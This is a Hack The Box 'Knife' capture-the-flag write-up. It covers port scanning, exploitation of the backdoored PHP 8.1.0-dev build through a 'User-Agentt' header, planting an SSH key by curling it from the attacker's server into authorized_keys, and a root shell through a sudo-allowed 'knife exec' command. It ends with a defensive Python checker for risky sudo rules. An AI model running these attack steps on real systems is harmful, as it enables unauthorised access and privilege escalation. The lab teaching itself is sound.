HTB: Knife

Enumeration

I ran nmap and found ports 22 and 80 open.

┌─[user@parrot]─[~]
└──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.132.165 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌─[user@parrot]─[~]
└──╼ echo $ports 
22,80
┌─[user@parrot]─[~]
└──╼ nmap -sC -sV -Pn -p$ports 10.129.132.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 14:36 BST
Nmap scan report for 10.129.132.165
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Because port 80 is open, I check whether there is a website hosted on the machine. There is one, but it has nothing interesting: just an empty static page.

A directory scan with gobuster reveals a single directory, "server-status", but still nothing interesting.

Scanning the site with nikto turns up something interesting: the "X-Powered-By" header reports PHP/8.1.0-dev. In March 2021 the php-src repository was compromised and a backdoor was committed to the master branch, which at the time identified itself as 8.1.0-dev; development builds made from it will evaluate, as PHP code, whatever follows the word "zerodium" in a "User-Agentt" request header.

┌─[user@parrot]─[~]
└──╼ nikto -h 10.129.132.165
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.129.132.165
+ Target Hostname:    10.129.132.165
+ Target Port:        80
+ Start Time:         2022-05-07 14:44:33 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ 6544 items checked: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-05-07 14:49:59 (GMT1) (326 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

User flag

With a quick search I found two exploits on GitHub, exploit-1 and exploit-2. I downloaded the first one because it opens a shell on the target directly and looks simpler to use, which is perfect for my objective.

I cloned the repository and ran the script. It worked perfectly; I took the flag and continued with the privilege escalation.

┌─[user@parrot]─[~/htb/knife/exploits/Exploit-PHP-8.1.0]
└──╼ ./php_8.1_rce.sh http://10.129.132.165
Checking if host is vulnerable...

Vulnerable --> PHP/8.1.0
[+] Spawning shell

$ whoami
james
$ ls -l /home/james
total 4
-r-------- 1 james james 33 May  7 11:56 user.txt
$ 

Root flag

First I upgraded the shell, purely for convenience. To do this I generate an SSH key pair and add the public key to the "authorized_keys" file of the james user.

# create the ssh key and host a web server
┌─[user@parrot]─[~/htb/knife/files]
└──╼ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa): ./id_rsa
[...]
┌─[user@parrot]─[~/htb/knife/files]
└──╼ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

# on the target download and add the key to the "authorized_keys" file
# (">" replaces any existing authorized_keys; use ">>" to append instead)
$ curl http://10.10.14.93:8080/id_rsa.pub > /home/james/.ssh/authorized_keys
$ 

# connect to the target using ssh
┌─[user@parrot]─[~/htb/knife/files]
└──╼ ssh -i id_rsa james@10.129.132.165
james@knife:~$ whoami
james
james@knife:~$ 

I upload linpeas.sh to the machine for a quick enumeration, and it quickly flags several candidate privilege escalations:

  1. The sudo version (1.8.31) is reported as vulnerable.
  2. Reported as vulnerable to CVE-2021-4034 (PwnKit).
  3. The james user can run "/usr/bin/knife" as root with sudo, without a password.

The first two are version-string checks, so a distro-patched package can still be flagged; the sudo rule is a fact, not a heuristic.

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The first two come down to downloading a public exploit and running it, so I will explore the third one instead.

A quick search shows that knife is a real program: the command-line tool for Chef.

Its entry on GTFOBins shows an easy way to escalate when it can be run with sudo: knife exec evaluates Ruby, and -E takes that Ruby as a string, so spawning a shell from it gives a root shell.

james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# ls -l /root/root.txt
-r-------- 1 root root 33 May  7 11:56 /root/root.txt
# 

And that’s it! I’m root.
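The sudo rule, not the version-string hits, is what actually gave root here, and it is the kind of finding that is easy to check for on any host. The following is an added example for this writeup, not linpeas or GTFOBins code: a small parser for the text that `sudo -l` prints, which flags rules whose target binary can evaluate code or spawn a shell. The INTERPRETER_LIKE set is an assumed, partial list (knife is in it because `knife exec -E` evaluates Ruby), and the systemctl rule in the sample is constructed for contrast with the knife rule shown on this page.

```python
#!/usr/bin/env python3
"""Flag sudo rules that hand out arbitrary code execution (added example).

Parses the output of `sudo -l` and reports rules whose command is ALL or
whose binary is known to run code or spawn a shell with the right arguments.
"""
import re

# Assumed, partial list; extend from GTFOBins for real use.
INTERPRETER_LIKE = {
    "knife", "python", "python3", "perl", "ruby", "vim", "vi",
    "less", "more", "find", "awk", "bash", "sh", "env",
}

# "(root) NOPASSWD: /usr/bin/knife"  ->  runas="root", tags="NOPASSWD: ", cmd="/usr/bin/knife"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Constructed sample: the knife rule from this box plus a benign rule for contrast.
SAMPLE = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl restart apache2
"""


def parse_sudo_l(text):
    """Return [(runas, nopasswd, command), ...] from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # Everything before the "User X may run..." line is Defaults noise.
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        # One rule line can list several commands separated by commas.
        for cmd in m.group("cmd").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(rules):
    """Subset of rules whose command is ALL or whose binary is interpreter-like."""
    out = []
    for runas, nopasswd, cmd in rules:
        binary = cmd.split()[0]           # drop fixed arguments
        name = binary.rsplit("/", 1)[-1]  # basename
        if cmd == "ALL" or name in INTERPRETER_LIKE:
            out.append((runas, nopasswd, cmd))
    return out


if __name__ == "__main__":
    for runas, nopasswd, cmd in risky_rules(parse_sudo_l(SAMPLE)):
        tag = "NOPASSWD " if nopasswd else ""
        print(f"[!] ({runas}) {tag}{cmd} can run arbitrary code")
```

Fixed arguments in a rule do not make it safe on their own (a rule for `/usr/bin/knife exec` would still evaluate Ruby), so the check keys on the binary rather than the full command line.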
